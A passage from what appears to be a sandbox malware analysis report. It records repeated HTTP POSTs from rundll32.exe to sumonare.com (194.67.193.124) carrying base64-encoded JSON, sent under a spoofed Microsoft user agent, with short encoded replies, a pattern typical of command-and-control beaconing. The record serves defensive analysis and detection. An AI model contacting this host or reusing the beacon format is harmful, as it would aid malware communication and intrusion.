                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:05.235469103 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:04 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                38192.168.2.749760194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:05.442023993 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:06.252729893 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:05 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                39192.168.2.749761194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:06.395435095 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:07.296926975 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:06 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                40192.168.2.749762194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:07.440248966 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:08.236881018 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:07 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                41192.168.2.749763194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:08.393946886 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:09.223903894 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:08 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                42192.168.2.749764194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:09.377934933 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:10.186553955 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:09 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                43192.168.2.749765194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:10.332046032 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:11.163144112 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:10 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                44192.168.2.749766194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:11.324028969 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:12.141433001 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:11 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                45192.168.2.749767194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:12.286068916 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:13.090064049 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:12 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                46192.168.2.749768194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:13.237914085 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:14.062916040 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:13 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                47192.168.2.749769194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:14.208745003 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:15.010991096 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:14 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                48192.168.2.749771194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:15.159926891 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
                Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 55 6e 5a 79 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 51 31 67 32 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 52 53 48 70 4e 51 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 52 5a 6c 68 4e 5a 32 4d 31 4b 31 64 75 5a 56 4e 7a 4b 32 67 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d
                Data Ascii: data=eyJDS3oiOiJ5UnZyIiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsInZZdEIiOiI3Q1g2Iiwidm9KYyI6IitRSHpNQT09Iiwid0FjSCI6InlRZlhNZ2M1K1duZVNzK2giLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
                Sep 28, 2024 03:23:15.968877077 CEST218INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:15 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                X-Powered-By: PHP/8.2.12
                Content-Length: 20
                Content-Type: text/html; charset=UTF-8
                Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 51 31 67 32 49 6e 30 3d
                Data Ascii: eyJUUGQiOiI3Q1g2In0=


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                49192.168.2.749772194.67.193.1244337356C:\Windows\SysWOW64\rundll32.exe
                TimestampBytes transferredDirectionData
                Sep 28, 2024 03:23:16.113471031 CEST455OUTPOST /projects/cloud-solutions/api-v2/index.php HTTP/1.1
                User-Agent: Microsoft-WNS/10.0
                Host: sumonare.com
                Content-Length: 249
                Content-Type: application/x-www-form-urlencoded
                Accept-Language: fr-CA
